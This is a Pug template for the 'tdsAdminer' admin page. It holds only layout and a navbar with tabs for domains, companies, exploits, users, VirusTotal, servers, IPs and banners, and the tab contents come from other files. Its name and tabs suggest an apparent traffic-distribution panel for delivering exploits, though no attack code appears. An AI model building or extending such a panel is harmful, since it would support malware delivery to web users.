doctype html
html(lang='ru')
    head
        meta(charset='UTF-8')
        script(src='/js/jquery.min.js')
        script(src='/js/bootstrap.min.js')
        link(rel='stylesheet', href='/css/bootstrap.min.css')
        link(rel='stylesheet', href='/css/bootstrap-theme.min.css')
        //script(src='/js/blueimp-gallery.min.js')
        //script(src='/js/blueimp-helper.js')
        //script(src='/js/blueimp-gallery-fullscreen.js')
        //script(src='/js/blueimp-gallery-indicator.js')
        //link(rel='stylesheet', href='/css/blueimp-gallery.min.css')
        //link(rel='stylesheet', href='/css/blueimp-gallery-indicator.css')
        //script(src='/js/jquery.blueimp-gallery.min.js')
        //script(src='/js/bootstrap-image-gallery.min.js')
        //link(rel='stylesheet', href='/css/bootstrap-image-gallery.min.css')
        script(src='/js/bootstrap-table.js')
        script(src='/js/bootstrap-table-locale-all.min.js')
        link(rel='stylesheet', href='/css/bootstrap-table.min.css')
        script(src='/js/fileinput.min.js')
        link(rel='stylesheet', href='/css/fileinput.min.css')
        link(rel='stylesheet', href='/css/fuelux.css')
        //link(rel='stylesheet', href='/css/fuelux.min.css')
        script(src='/js/fuelux.min.js')
        script(src='/js/eventemitter2.js')
        link(rel='stylesheet', href='/css/bootstrap-switch.min.css')
        script(src='/js/bootstrap-switch.min.js')
        link(rel='stylesheet', href='/css/jquery.bootstrap-touchspin.min.css')
        script(src='/js/jquery.bootstrap-touchspin.min.js')
        //link(rel='stylesheet', href='/css/bootstrap-select.min.css')
        //script(src='/js/bootstrap-select.js')
        script(src='/js/jquery.ddslick.min.js')
        //link(rel='stylesheet', href='/css/bootstrap-nav-wizard.min.css')
        link(rel='stylesheet', href='/css/admin.css')
        script(src='/js/core.js')
    body.fuelux
        .navbar.navbar-inverse(role='navigation')
            .navbar-header
              button.navbar-toggle(type='button', data-toggle='collapse', data-target='.navbar-collapse')
                span.sr-only Toggle navigation
                span.icon-bar
                span.icon-bar
                span.icon-bar
            .collapse.navbar-collapse
                ul.nav.navbar-nav
                    li.active
                        a(href='#') tdsAdminer
                    li
                        a(href='#about') About
                    li
                        a(href='#contact') Contact
        #loading.progress.progress-striped.active(style='display:none',role='progressbar')
            .bar
        #alert
        .navbar(role='navigation')
            .container-fluid
                .row
                    .tabbable
                        ul.nav.nav-pills.nav-stacked.col-md-1
                            li
                                a(href='#panel-domain', data-toggle='tab') domain
                            li
                                a(href='#panel-company', data-toggle='tab') company
                            li
                                a(href='#panel-exploit', data-toggle='tab') exploit
                            li
                                a(href='#panel-user', data-toggle='tab') users
                            li
                                a(href='#panel-virustotal', data-toggle='tab') virustotal
                            li
                                a(href='#panel-settings', data-toggle='tab') settings
                            li
                                a(href='#panel-server', data-toggle='tab') server
                            li
                                a(href='#panel-ip', data-toggle='tab') ip
                            li
                                a(href='#panel-banner', data-toggle='tab') banner
                        .tab-content.col-md-10
                            #panel-domain.tab-pane
                                include domain
                            #panel-company.tab-pane
                                include company
                            #panel-user.tab-pane
                                include user
                            #panel-settings.tab-pane
                                include settings
                            #panel-server.tab-pane
                                include server
                            #panel-ip.tab-pane
                                include ip
                            #panel-virustotal.tab-pane
                                include virustotal
                            #panel-exploit.tab-pane
                                include exploit
                            #panel-banner.tab-pane
                                include banners
        #buffer
            include login
            include country
            include browser
            include banner
            include js
            include filter